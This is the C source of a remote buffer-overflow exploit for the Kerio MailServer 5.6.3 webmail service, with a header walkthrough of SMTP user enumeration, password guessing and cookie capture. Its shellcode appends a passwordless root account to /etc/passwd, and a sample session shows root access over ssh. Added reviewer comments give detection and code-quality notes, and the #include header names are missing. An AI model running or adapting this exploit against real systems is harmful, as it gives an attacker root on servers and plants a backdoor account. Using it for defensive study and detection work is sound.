/* Remote Buffer Overflow Exploit for Kerio MailServer 5.6.3 */ /* ========================================================= */ /* By B-r00t ok rcpt to: nosuchuser@scriptkiddie.net 550 5.1.1 Mailbox does not exist rcpt to:admin@scriptkiddie.net 250 2.1.5 Recipient ok (local) << default admin account. rcpt to: fred@scriptkiddie.net 250 2.1.5 Recipient ok (local) << user fred seems to exist. rset 250 2.0.0 Reset state quit 221 2.0.0 SMTP closing connection Connection closed by foreign host. */ /* Using a dictionary attack to obtain a large number */ /* of accounts in conjunction with users natural */ /* stupidity for using easy to guess passwords should */ /* yield at least one valid account. */ /* */ /* Once an account has been cracked, login to the */ /* Kerio webmail service and record the 'userid' */ /* cookie value: - */ /* $ lynx 192.168.0.10 Username: fred___________ Password: _______________ OK 192.168.0.10 cookie: userid=7dc1700017e708a5 Allow? (Y/N/Always/neVer) */ /* Accept the cookie 'Y' to ensure you are fully */ /* logged in to the Kerio webmail service. */ /* [br00t@silvia:~] $ ./keriobaby 192.168.0.10 userid=7dc1700017e708a5 Payload: 408 / 408 bytes Wall0p! ... !!! If successful a UID 0 Account 'keriohacker' has been appended to /etc/passwd. Use 'ssh' or 'su' (if local) to get r00t! .... [br00t@silvia:~] $ ssh -l keriohacker 192.168.0.10 Last login: Thu Jun 5 08:21:30 2003 sh-2.05# id uid=0(root) gid=0(root) groups=0(root) sh-2.05# tail -1 /etc/passwd keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh sh-2.05# *SSH assumes: PermitRootLogin yes & PermitEmptyPasswords yes Alternative: Recode the shellcode to add normal user! That's All Folks ... ENJOY! 
*/
/*
 * NOTE(review): the header names of the seven #include lines below were
 * lost when this page was extracted (the <...> part is missing).  They are
 * left exactly as found rather than guessed.
 */
#include
#include
#include
#include
#include
#include
#include

#define DEST_PORT 80   /* TCP port the single HTTP request is sent to */

/*
 * Driver for the Kerio MailServer 5.6.3 webmail overflow described in the
 * header comment.  What the visible code does:
 *   - builds one HTTP/1.0 request "GET /list?folder=~" whose folder value
 *     is a 408-byte payload (NOP sled + shellcode) followed by the
 *     hard-coded return address twice,
 *   - appends the caller's webmail cookie (argv[2]) verbatim in a
 *     "Cookie:" header,
 *   - opens one TCP connection to argv[1]:DEST_PORT, sends the request,
 *     closes the socket and prints a fixed banner.
 *
 * argv[1]  target IPv4 address in dotted-quad form (parsed by inet_aton)
 * argv[2]  webmail cookie string, e.g. "userid=<hex>" (see usage text)
 *
 * Exit status: 1 on usage error or socket() failure, 2 on a bad address,
 * 3 on connect() failure, 4 on send() failure.  Nothing is read back from
 * the server, so the program cannot tell whether the overflow worked.
 *
 * Defender notes, limited to what this listing shows:
 *   - The vulnerable input is the 'folder' query parameter of /list.  The
 *     write-up obtains the cookie by logging in to webmail first, so a
 *     valid account appears to be a prerequisite.
 *   - A /list request whose folder value is several hundred bytes of \x90
 *     and non-printable data is a high-fidelity detection signature in
 *     web or proxy logs.
 *   - The return address is bound to one build (the RedHat 7.2 RPM named
 *     on the 'ret' line); no other offsets are given.
 *   - Per the listing's own comment the payload appends a UID 0 line to
 *     /etc/passwd; file-integrity monitoring of /etc/passwd, and the sshd
 *     settings the header comment depends on (PermitRootLogin,
 *     PermitEmptyPasswords), are the relevant follow-on controls.
 *
 * Code-quality defects a reviewer would flag (code left as-is):
 *   - argv[2] is strcat'd into buffer[700] with no length check.  The
 *     fixed parts sum to 457 bytes (18 + 408 + 4 + 4 + 9 + 2 + 8 + 4), so a
 *     cookie longer than 242 bytes overflows this program's own stack.
 *   - strlen() returns size_t but is printed with %d.
 *   - send() may return a short count; only -1 is treated as an error.
 *   - strcpy/strcat are used throughout instead of bounded copies.
 */
int main ( int argc, char *argv[] )
{
    int socketfd, bytes;
    struct sockaddr_in dest_addr;
    char buffer[700];                       /* request buffer; see length note above */
    // char ret[] = "\x07\xf7\x7f\xbe"; // Use this if attached with GDB
    char ret[] = "\x07\xf7\xff\xbe"; // RedHat Linux 7.2 + kerio-mailserver-mcafee-5.6.3-rh7.i386.rpm
    char *ptr = buffer;                     /* alias passed to send() */
    char req[] = "GET /list?folder=~";      /* request line prefix; payload follows '~' */
    char cr[] = "\x0D\x0A";                 /* HTTP line terminator */
    /* 408 bytes total: 24 x 10 NOPs (240) + 168 bytes of shellcode incl. trailing NOPs */
    char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    // Fat Bloke Shellcode to avoid HTTP chars by B-r00t..
    // Appends: keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
    "\xeb\x55\x5e\xb0\xff\x2c\xd0\x88\x06\x88\x46\x04\x88\x46\x34"
    "\x88\x46\x39\x88\x46\x3d\x31\xc0\x88\x46\x0b\x88\x46\x41\x66"
    "\xb8\x0b\x27\x66\x2d\x01\x27\x66\x89\x46\x40\x8d\x5e\x0c\x89"
    "\x5e\x42\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\xe4\x01\xcd"
    "\x80\x89\xc3\xb0\x04\x8b\x4e\x42\x31\xd2\xb2\xff\x80\xea\xca"
    "\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xa6\xff"
    "\xff\xff\x58\x65\x74\x63\x58\x70\x61\x73\x73\x77\x64\x58\x6b"
    "\x65\x72\x69\x6f\x68\x61\x63\x6b\x65\x72\x3a\x3a\x30\x3a\x30"
    "\x3a\x42\x2d\x72\x30\x30\x74\x7e\x52\x30\x78\x7e\x59\x33\x72"
    "\x7e\x57\x30\x72\x6c\x64\x21\x2e\x3a\x58\x74\x6d\x70\x3a\x58"
    "\x62\x69\x6e\x58\x73\x68\x58\x58\x41\x41\x41\x41"
    "\x90\x90\x90\x90\x90\x90";

    memset (buffer, '\0', sizeof (buffer));

    /* Both argv[1] and argv[2] are required; checked before either is read. */
    if (argc < 3) {
        printf("\nUsage: %s [IP_ADDRESS] [COOKIE]", argv[0]);
        printf("\nExample: %s 10.0.0.1 userid=771c740df0270936\n", argv[0]);
        exit (1);
    }

    /* "408" is the expected size hard-coded in the message; %d vs size_t is a format mismatch */
    printf ("\nPayload: %d / 408 bytes\n\n", strlen(shellcode));

    /* Assemble the request: prefix, payload, ret x2, version, CRLF, cookie, CRLF CRLF.
     * argv[2] is the only unbounded part; see the buffer-length note above. */
    strcpy (buffer, req);
    strcat (buffer, shellcode);
    strcat (buffer, ret);
    strcat (buffer, ret);
    strcat (buffer, " HTTP/1.0");
    strcat (buffer, cr);
    strcat (buffer, "Cookie: ");
    strcat (buffer, argv[2]);
    strcat (buffer, cr);
    strcat (buffer, cr);

    if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("Socket");
        exit (1);
    }

    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = htons(DEST_PORT);
    /* inet_aton returns 0 on an unparsable address; errno is not set, so perror's text is generic */
    if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
        perror("inet_aton problems");
        exit (2);
    }
    memset( &(dest_addr.sin_zero), '\0', 8);

    if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("connect failed");
        close (socketfd);
        exit (3);
    }

    /* Single send; a short write is not detected, only -1. No response is read. */
    bytes = (send (socketfd, ptr, strlen(buffer), 0));
    if (bytes == -1) {
        perror("send error");
        close (socketfd);
        exit(4);
    }

    close (socketfd);

    /* Banner printed unconditionally after the send; it does not reflect the outcome. */
    printf ("\nWall0p! ... !!!\n\n");
    printf ("\nIf successful a UID 0 Account 'keriohacker'");
    printf ("\nhas been appended to /etc/passwd. Use 'ssh'");
    printf ("\nor 'su' (if local) to get r00t! ....\n\n");
}

/* Shoutz: Marshal-l, Rux0r, macavity, Monkfish, Mum & Dad. */
/* B-r00t aka B#. 2003. */
/* "If You Can't B-r00t Then Just B#." */
/* That One Doris ... U-Know-Who-U-R! */
/* THE END - AMEN. */